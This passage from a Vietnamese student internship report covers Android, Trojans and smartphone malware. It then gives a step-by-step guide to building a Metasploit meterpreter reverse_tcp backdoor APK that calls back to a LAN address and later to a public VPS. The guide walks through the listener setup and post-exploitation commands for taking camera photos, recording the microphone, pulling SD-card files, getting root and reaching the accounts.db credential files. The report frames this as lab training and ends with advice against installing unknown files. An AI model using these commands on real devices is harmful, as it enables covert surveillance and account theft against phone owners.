rộng để kết hợp tự do giữa các công nghệ nổi trội. Nền tảng này sẽ tiếp tục phát triển bởi cộng đồng phát triển để tạo ra các ứng dụng di động hoàn hảo. 2. Tính ngang bằng của các ứng dụng. Với Android, không có sự khác nhau giữa các ứng dụng điện thoại cơ bản với ứng dụng của bên thứ ba. Chúng được xây dựng để truy cập như nhau tới một loạt các ứng dụng và dịch vụ của điện thoại. Với các thiết bị được xây dựng trên nền tảng Android, người dùng có thể đáp ứng đầy đủ các nhu cầu mà họ thích. Chúng ta có thể đổi màn hình nền, kiểu gọi điện thoại, hay bất kể ứng dụng nào. Chúng ta thậm chí có thể hướng dẫn điện thoại chỉ xem những ảnh mình thích. 3. Phá vỡ rào cản phát triển ứng dụng. Android phá vỡ rào cản để tạo ứng dụng mới và cải tiến. Một người phát triển có thể kết hợp thông tin từ trang web với dữ liệu trên điện thoại cá nhân – chẳng hạn như danh bạ, lịch hay vị trí trên bản đồ – để cung cấp chính xác hơn cho người khác. Với Android, người phát triển có thể xây dựng một ứng dụng mà cho phép người dùng xem vị trí của những người bạn và thông báo khi họ đang ở vị trí lân cận. Tất cả được lập trình dễ dàng thông qua sự hỗ trợ của MapView và dịch vụ định vị toàn cầu GPS. 4. Xây dựng ứng dụng dễ dàng và nhanh chóng. Android cung cấp bộ thư viện giao diện lập trình ứng dụng đồ sộ và các công cụ để viết các ứng
  • 33. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 32 dụng phức tạp. Ví dụ, Android có thể cho phép người phát triển biết được vị trí của thiết bị và cho phép các thiết bị giao tiếp với nhau để có thể tạo nên mạng xã hội chia sẻ ngang hàng rộng khắp. Thêm nữa, Android còn bao gồm một bộ công cụ đầy đủ giúp cho việc phát triển trở nên dễ dàng. 2.1.4 Giới thiệu về Trojan: Trojan - một chương trình dạng virus, một kẻ làm nội gián trong máy tính của bạn đã giúp cho hacker điều khiển máy tính của bạn, Trojan giúp hacker lấy những thông tin quý báu của bạn, thậm chí hắn có thể xóa hoặc định dạng lại cả ổ cứng của bạn nữa. Trojan có thể nhiễm vào máy của bạn qua tập tin gắn kèm thư điện tử mà bạn đã vô tình tải về và chạy thử, hoặc có lẫn trong những chương trình trò chơi, nhưng chương trình mà bạn không rõ nguồn gốc... Ðể "moi ruột" được mật khẩu của các chủ thuê bao, hacker nội thường sử dụng virus có họ Trojan gửi đến các thuê bao cần tấn công thông qua thư điện tử (e- mail) dưới dạng dữ liệu đính kèm (File Attachment). Chỉ cần khi các chủ thuê bao vô tình mở file này, lập tức Trojan được kích động và tự động sao chép lại tất cả các thông số về mật khẩu của chủ thuê bao. Không chỉ là mật khẩu truy cập Intemet mà ngay cả đến mật khẩu của hòm thư điện tử cũng dễ dàng bị đánh cắp. Ngay sau khi chủ thuê bao kết nối Internet, Trojan sẽ bí mật sinh ra một e- mail và gửi mật khẩu đánh cắp về cho "tin tặc". Và sau đó mỗi lần thay đổi mật khẩu virus Trojan sẽ tiếp tục lặng lẽ "tuồn" của ăn cắp tới một địa chỉ mà hacker nội đã định sẵn. Ðể đánh lừa "nạn nhân", "tin tặc" luôn tìm cách giăng ra những loại bẫy hết sức tinh vi. Tinh vi đến nỗi không ít chủ thuê bao dù rất 'kỹ tính" nhưng vẫn cứ "sập" bẫy như thường. Phổ biến nhất là hacker nội đội lốt những tổ chức hay công ty có uy tín để đánh lừa chủ thuê bao bằng chương trình phần mềm
  • 34. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 33 thư ma Ghostmail. "tin tặc" dễ dàng thảo ra những e-mail mạo danh với nội dung: "Hiện giờ tình trạng đánh cắp mật khẩu thuê bao đang rất phổ biến, nhằm để phòng tránh, chúng tôi xin được gửi tới quý khách chương trình phần mềm Tr-Protect (Vi rút Trojan sau khi đã đổi tên)". Có khi chúng lại "đội lốt" chuyên gia lập trình chương trình diệt virus số 1 Việt Nam Nguyễn Tử Quảng: "Ðể phòng chống virus Chernobyl 26- 4, chúng tôi hân hạnh gởi tới quý ngài chương trình BKAV 383. Mong quý vị dùng thử Mọi ý kiến đóng góp xin gửi về địa chỉ sau quangnt@it-hut.edu.vn". Khi nhận được những tin kiểu như vậy, có không ít thuê bao dễ dàng "cắn câu" và cứ "tự nhiên" cho chạy chương trình vi rút Trojan mà không hề nhận thức được rằng họ đang "tự nguyện" hiến mình thành nạn nhân của bọn "tin tặc". Như vậy, khi Trojan được kích hoạt trên máy của bạn và khi bạn truy cập Internet thì Trojan có thể lấy mật khẩu truy cập mạng, lấy danh sách thư điện tử và thậm chí cả cấu hình máy tính của bạn để gửi cho một địa chỉ thư điện tử của tên tin tặc. Nhưng nguy hiểm hơn, Trojan còn gửi cả địa chỉ mạng IP, là địa chỉ mà nhà cung cấp dịch vụ mạng (ISP) gán cho bạn lúc truy cập; tên tin tặc sẽ sử dụng địa chỉ IP của bạn để thiết lập kết nối từ máy tính của hắn tới máy tính của bạn qua mạng Internet. Trojan sẽ lấy thông tin, xóa thông tin... Các thủ đoạn của Hacker 1. Giả danh nhà cung cấp dịch vụ: Hacker lấy danh nghĩa nhà cung cấp dịch vụ Internet (ISP) gọi điện thoại hoặc gởi e-mail yêu cầu bạn cung cấp password hoặc đổi password theo họ gợi ý. Hacker mail cho bạn một Attached File (tập tin .exe) cho biết là file hỗ trợ sử dụng Internet nhưng thực chất đây là file ăn cắp password. 2. Lợi dụng sự tin tưởng khi mượn hoặc sửa chữa máy tính của bạn họ sẽ dễ dàng lấy mật khẩu vì đa số người sử dụng đều thường xuyên Save Password vào máy. 3. Cài "gián điệp" vào máy tính của bạn: Ðây là phương thức cổ điển nhưng lại là cách ăn cắp password thông dụng và hiệu quả nhất mà không tốn công sức, thường là file Horse Trojan được gởi qua e-mail với những lời mời chào hết sức hấp dẫn, kích thích tò mò. Nếu bạn mở file này thì ngay lập tức máy bạn đã bị nhiễm virus và từ đó trở đi, password của bạn được thường xuyên gởi về cho Hacker ngay cả khi bạn thay password mới.
  • 35. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 34 Ðề phòng, tìm và diệt Trojan? Ðể đề phòng bị nhiễm Trojan và các loại virus, bạn cần thận trọng khi tải các tập tin trên mạng. Ðể tìm và diệt Trojan, bạn cần tiến hành theo các bước sau: 1. Không nên tải và chạy thử những tập tin gắn kèm thư điện tử gửi cho bạn từ những địa chỉ thư điện tử mà bạn không rõ. Cũng vì lý do này mà tác giả của chương trình diệt vi rút thông dụng BKAV đã cảnh báo có nhiều kẻ mạo danh gửi cho bạn chương trình diệt virus mà thực chất là Trojan. 2. Sử dụng chương trình phát hiện và diệt Trojan, bạn có thể tìm kiếm trên mạng Internet với từ khóa "Detect and destroy Trojan". 3. Nếu bạn không có sẵn trong tay những chương trình phát hiện và diệt Trojan thì bạn có thể kiểm tra Registry của Window: HKEY – LOCAL – MACHINE Software Microsoft Windows Current Version Run. Nếu thấy có đường dẫn tới một chương trình mà bạn biết là không phải của Window hoặc của các chương trình tiện ích, bạn hãy thoát Window về chế độ DOS và xóa tập tin theo đường dẫn của Registry, vào lại Window và xóa dòng đã ghi trong Registry. Bạn cũng có thể kiểm tra cả tập tin Win.ini, System.ini trong thư mục C:Windows sau mục Run hoặc Load. 2.1.5 Giới thiệu về Malware:
  • 36. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 35 Malware (phần mềm ác tính) viết tắt của cụm từ Malicious Sofware, là một phần mềm máy tính được thiết kế với mục đích thâm nhập hoặc gây hỏng hóc máy tính mà người sử dụng không hề hay biết. Theo thống kê của các hãng bảo mật trên thế giới thì hiện các Malware hiện nay mới chỉ dừng lại ở mức độ xâm nhập và ăn cắp thông tin của người dùng và nó chưa có cơ chế lây lan. Theo các kết quả trên thì Malware trên Smartphone hiện nay về cách thức hoạt động giống như một phần mềm gián điệp (Trojan) hơn là một virus phá hủy. Cơ chế hoạt động của Malware Malware này hoạt động qua hai giai đoạn: - Giai đoạn đầu: Malware được nhúng vào trong một ứng dụng và sẽ chiếm được quyền root vào thiết bị của bạn ngay sau khi bạn chạy ứng dụng đó trong lần sử dụng đầu tiên. - Giai đoạn 2: Malware tự động cài đặt một ứng dụng thứ 2 với một permission đặc biệt cho phép quyền uninstall. Một khi các ứng dụng thứ 2 được cài đặt, nó có thể gửi các thông tin nhạy cảm tới một máy chủ từ xa và âm thầm tải thêm các ứng dụng khác. Việc cài đặt ứng dụng hệ thống này nhằm ngăn ngừa người dùng xem hoặc gỡ bỏ cài đặt các ứng dụng mà không được phép. Không giống như giai đoạn đầu, người dùng phải khởi động ứng dụng để bắt đầu việc lây nhiễm. Ở giai đoạn thứ hai ứng dụng tự động làm một số việc như là confirm, check-in. Một điều nữa khiến cho bạn không thể biết chúng hoạt động lúc nào (hầu hết vào khoảng thời gian từ 11h đêm tới 8h sáng ngày hôm sau). Đây là khoảng thời gian mà điện thoại ít có khả năng được sử dụng nhất. Điều này làm cho người dùng khó khăn hơn trong việc phát hiện một hành vi bất thường trên chiếc smartphone của mình. Mục đích của Malware Mục đích của Malware mới chỉ dừng lại ở mức độ làm cho chiếc điện thoại của người dùng tự động cài đặt những ứng dụng chứa mã độc khác. Tuy nhiên các biến thể về sau đã kịp thời biến đổi để gây ra các mối nguy hại lớn hơn rất nhiều. Ví dụ như Hippo SMS được tìm thấy mới đây có khả năng tự gửi tin nhắn mà không cần sự cho phép của người dùng, việc này sẽ khiến tiền cước phí của người dùng tăng lên một cách chóng mặt mà người dùng không biết rõ lí do tại sao. Hoặc một Malware khác là Zitmo, Malware này đưa ra các ứng dụng kích
  • 37. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 36 hoạt mọi hành động liên quan đến dịch vụ ngân hàng, tiếp nhận SMS gửi đến và chuyển tới máy chủ. Các đoạn code dùng 1 lần mà các ngân hàng thường gửi tới khách hàng thông qua tin nhắn SMS để chứng thực sẽ bị thu thập bởi các malware này. Hiện nay còn có một số Malware còn có khả năng nghe lén tất cả các cuộc điện thoại. Vấn đề này thực sự nguy hiểm khi tất cả các vấn đề riêng tư của chúng ta đang bị một theo dõi, vì vậy những mối nguy hiểm từ mã độc trên Android đang thực sự đe dọa đến an sự an toàn của người dùng hệ điều hành này. 2.1.6 Sinh mã độc trên Kali Linux: Ta sử dụng Metasploit framework trên Kali Linux để tạo một payload, khi máy android tải về và mở payload lên thì sẽ bị xâm nhập và điều khiển. Nếu sử dụng máy ảo Kali Linux bằng VMware, ta nên thiết lập phần Network như sau: Bấm vào VM -> Settings... ở thanh lựa chọn của VMware Hình 2.1.24 Setting network VMware (Step 1)
  • 38. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 37 Bấm vào Network Adapter và chọn Bridged: connection directly to the physical network Hình 2.1.25 Setting network VMware (Step 2) Bấm vào Edit -> Virtual Network Editor... Hình 2.1.26 Setting network VMware (Step 3)
  • 39. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 38 Trên phần Bridge (connect VMs directly to the external network) chọn adapter của máy thật Hình 2.1.27 Setting network VMware (Step 4) Sau đây ta vào phần chính tạo backdoor và xâm nhập điều khiển android Đầu tiên mở terminal và gõ dòng lệnh msfpayload android/meterpreter/reverse_tcp lhost=192.168.0.104 lport=8080 R > /root/Desktop/files.apk
  • 40. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 39 192.168.0.104 là địa chỉ IP của máy Kali, ta có thể sử dụng lệnh ifconfig để xem IP của máy Kali 8080 là số port, có thể chọn port khác, không nên chọn các port thường sử dụng Lệnh trên sẽ tạo ra 1 file files.apk trên desktop của Kali, đây chính là một Metasploit reverse tcp backdoor.
  • 41. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 40 Tiếp theo, gõ lệnh msfconsole Sau khi msfconsile load xong, ta tạo một handler để xử lí dữ liệu truyền về bằng cách gõ lệnh sau: use exploit/multi/handler set payload android/meterpreter/reverse_tcp
  • 42. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 41 set lhost 192.168.0.104 – [nhập địa chỉ IP giống với khi tạo payload ở trên]. set lport 8080 – [nhập port giống với port khi tạo payload ở trên]. Exploit Màn hình sẽ như sau, lúc này ta đang chờ một máy android mở backdoor. 2.1.7 Đưa mã độc vào thiết bị Android: Vì không có máy Android thật nên mình test thử với một máy Galaxy Nexus giả lập bằng phần mềm GennyMotion (đăng ký một tài khoản và donwload tại https://cloud.genymotion.com/page/launchpad/download/), tải về files.apk, cài đặt và mở lên được giao diện như dưới, nhấp vào nút “ReverseTCP”:
  • 43. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 42 Vậy là ta đã kết nối thành công tới máy Android này, ở msfconsole sẽ như sau:
  • 44. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 43  Sử dụng camera: Để xem danh sách camera, nhập webcam_list Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ở danh sách camera ở phần trước. Ví dụ như sau:
  • 45. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 44 File hình đã chụp từ camera của máy android là FrumITki.jpeg được lưu ở /root của máy.  Ghi âm Để thực hiện ghi âm, nhập lệnh record_mic và file ghi âm sẽ được lưu về máy
  • 46. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 45 2.1.8 Xâm nhập SD card của thiết bị Android từ Kali Linux: Để vào sdcard, nhập lệnh: cd /sdcard và lệnh ls để xem danh sách file, thư mục Ví dụ ở đây, ta tải file App.apk trong thư mục download của sdcard
  • 47. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 46 Dùng lệnh cd /sdcard/Download để vào thư mục
  • 48. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 47 Như trên hình, ta thấy 1 file là App.apk, để tải về máy, ta nhập lệnh Download App.apk Và file này sẽ được tải về thư mục /root của máy Kali 2.1.9 Kết luận: Như vậy, ta đã tìm hiểu về Kali Linux, cách sử dụng Metasploit của Kali Linux để xâm nhập và điều khiển, truyền dữ liệu từ máy android về máy. Sau khi thử nghiệm cách tấn công này, ta rút ra kết luận: không nên tải về và chạy file lạ trên máy android để bảo đảm không cài nhầm backdoor như đã thấy ở trên, chỉ cần máy bị nhiễm backdoor là ta đã có thể xem như có toàn quyền kiểm soát máy android đó. 2.2 Làm trên VPS 2.2.1 Giới thiệu về VPS: Định nghĩa Máy chủ ảo (Virtual Private Server -VPS) là phương pháp phân chia một máy chủ vật lý thành nhiều máy chủ ảo. Trong khi trên một server chạy một
  • 49. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 48 Share Host thì có thể có hàng trăm tài khoản chạy cùng lúc, nhưng trên server chạy VPS thì con số này chỉ bằng 1/10. Do vậy, VPS có hiệu năng cao hơn Share Host rất nhiều. Mỗi máy chủ là một hệ thống hoàn toàn riêng biệt, có hệ điều hành riêng, có toàn quyền quản lý root và có thể restart lại hệ thống bất cứ lúc nào. Do vậy, VPS hạn chế 100% khả năng bị hack local. Trên 1 server chạy Share Host có nhiều Website chạy chung với nhau, chung tài nguyên server, nếu 1 Website bị tấn công Ddos, botnet quá mạnh sẽ làm ảnh hưởng đến các Website khác cùng server, riêng server VPS, một tài khoản trên VPS bị tấn công thì mọi tài khoản khác trên VPS đều hoạt động bình thường. VPS dành cho các doanh nghiệp vừa và những trang Web lớn hoặc mã nguồn nặng, nếu chạy trên Share Host sẽ không đáp ứng đủ yêu cầu.Tuy nhiên, VPS đòi hỏi người sử dụng phải có thêm một số kiến thức về bảo mật, cấu hình server,…. Đặc điểm về thông số VPS Hoạt động hoàn toàn như một server riêng nên sở hữu một phần CPU riêng, dung lượng RAM riêng, dung lượng ổ HDD riêng, địa chỉ IP riêng và hệ điều hành riêng. Tiết kiệm được nhiều chi phí so với việc thuê một server riêng. Ngoài việc dùng VPS để thiết lập Web Server, Mail Server cũng như các ứng dụng khác thì có thể cài đặt để thực hiện những yêu cầu riêng như truy cập Web bằng trình duyệt Web trên VPS, dowload/upload bittorrent với tốc độ cao… Trong trường hợp VPS bị thiếu tài nguyên thì có thể dễ dàng nâng cấp tài nguyên mà không cần phải khởi động lại hệ thống. Có thể cài lại hệ điều hành với thời gian từ 5-10 phút. Giá trị khi sử dụng VPS Server mạnh với nhiều cấu hình cho phép khách hàng dễ dàng lựa chọn gói VPS phù hợp. Miễn phí chi phí cài đặt ban đầu cũng như cấu hình hoạt động cho khác hàng.
  • 50. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 49 Hỗ trợ khác hàng cài đặt miễn phí thêm các phần mềm riêng. Được cấu hình và cài đặt hệ thống Firewall và DDOS Protection. Bộ phận kỹ thuật kịp thời can thiệp nhanh chóng nếu có sự cố phát sinh. 2.2.2 Cài đặt mã độc trên VPS: Giới thiệu Metasploit là một công cụ khai thác lỗ hổng của các hệ điều hành, dùng để kiểm tra, tấn công và khai thác lỗi của các service. Metasploit được xây dựng từ ngôn ngữ hướng đối tượng Perl, với những components được viết bằng C, assembler, và Python. Metasploit có thể chạy trên hầu hết các hệ điều hành: Linux, Windows, Mac OS. Cài đặt Tải gói cài đặt của Metasploit, ở đây ta có 2 phiên bản là Pro và Community. Ta chọn phiên bản Community miễn phí và dùng cho nghiên cứu.
  • 51. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 50 Sau khi tải về gói cài đặt của Metasploit Community ta cài đặt như những phần mềm khác.
  • 52. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 51 Chọn folder cài đặt: Cổng của dịch vụ Metasploit sẽ sử dụng, mặc định là 3790:
  • 53. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 52 Chọn server và ngày hết hạn, để mặc định: Quá trình cài đặt của Metasploit:
  • 54. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 53 Tiến trình hoàn tất, chọn Finish và truy cập đến giao diện web của chương trình: Sau khi Finish trình duyệt web mở lên và đi tới giao diện
  • 55. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 54 Click vào link: https://localhost:3790/ sẽ dẫn đến trang tạo tài khoản để login vào Metasploit. Điền Username, Password sử dụng và một số thông tin bổ xung, rồi chọn Create Account: Trình duyệt chuyển đến trang nhập key để active chương trình, key này được gửi miễn phí đến mail khi tải phần mềm. Sau khi điền key nhấn Activate License:
  • 56. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 55 Giao diện chương trình Metasploit Console
  • 57. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 56 2.2.3 Từ VPS xâm nhập vào thiết bị Android: Các bước thực hiện 1. Sử dụng Kali Linux để tạo file APK làm backdoor để hack vào Android như trên mang LAN với địa chỉ IP là địa chỉ của VPS Chúng ta vẫn sử dụng lệnh msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.132 lport=4444 R > /root/Desktop/files.apk Ở đây địa chỉ VPS là 14.0.21.132 2. Khởi động Metasploit Console trên VPS 3. Chúng ta thực hiện các bước xâm nhập như đã đề cập ở phần trên, ở đây chỉ khác là sử dụng chính IP của VPS
  • 58. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 57 4. Sau khi máy nạn nhân tải về file apk đã được tạo ra, máy android đó sẽ bị hack
  • 59. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 58 5. Sử dụng lệnh Help để xem các lệnh được metasploit hỗ trợ Để xem thông tin về máy, nhập lệnh sysinfo Để xem các tác vụ đang chạy gõ ps Xem ip gõ ifconfig Xem danh sách thư mục, file gõ ls Sử dụng camera: Để xem danh sách camera, nhập webcam_list Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ở danh sách camera ở phần trước. Ghi âm Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy
  • 60. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 59 Lấy file từ sd card Để vào sdcard, nhập lệnh: cd /sdcard và lệnh ls để xem danh sách file, thư mục Dùng lệnh cd /sdcard/Download để vào thư mục Để tải về máy, ta nhập lệnh Download App.apk Để upload gõ lệnh upload Và file này sẽ được tải về thư mục root của máy Kali Gõ shell để vào lệnh kiểm tra xem có root chưa gõ su whoami Nếu báo unknown id is 0 tức là đã root ls -l danh mục file và các quyền cd để chuyển hướng thư mục Để ăn cắp tài khoản, mật khẩu, file apk và thay đổi các quyền /DATA /DATA/APP /DATA/SYSTEM /DATA/SYSTEM/accounts.db /DATA/SYSTEM/SYNC/accounts.xml /SYSTEM/APP/ để xem danh sách và down load các file hay thay đổi các file trong ROM đầu tiên phải gõ lệnh SU để có toàn quyền truy cập để có đường dẫn đầy đủ dùng lệnh chmod -R 777 path to filename Ví dụ chmod -R 777 /data Ctrl + C để quay lại Sử dụng SQLite để mở file db
  • 61. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 60 3 KẾT QUẢ ĐẠT ĐƯỢC Những kiến thức lý thuyết đã được củng cố:  Tìm hiểu về lịch sử, quá trình phát triển của hệ điều hành Android  Tìm hiểu về hệ điều hành Kali Linux  Tìm hiểu về các lỗ hổng bảo mật của Windows và Android  Tìm hiểu về cách sửa đổi file APK và thực hiện Signing ứng dụng Những kỹ năng thực hành đã được học thêm:  Thực hiện cài đặt Android trên máy ảo  Cài đặt Kali Linux, sử dụng nó để hack vào các lỗ hổng bảo mật của Windows và Android  Thi lấy chứng chỉ System Hacking của trung tâm Athena  Thực hiện sửa đổi, tạo ra các file Trojan, Backdoor sau đó cài đặt vào Android  Biết thêm về một số bài học trong lớp Hacker mũ trắng Những kinh nghiệm thực tiễn đã tích lũy được: Qua gần 2 tháng thực tập, bản thân em đã đúc kết được nhiều kinh nghiệm quý báu, thứ nhất đó là các kĩ năng về chuyên môn, em đã được học và cũng cố các kiến thức mới bên cạnh các kiến thức nền tảng. Hơn đó nữa là quá trình thực tập trong môi trường doanh nghiệp đã cho em làm quen dần để không bỡ ngỡ trong quá trình đi làm sau này, thông qua các kĩ năng giao tiếp và ứng xử.
  • 62. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 61 4 KẾT LUẬN QUÁ TRÌNH THỰC TẬP .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... ....................................................................................................................................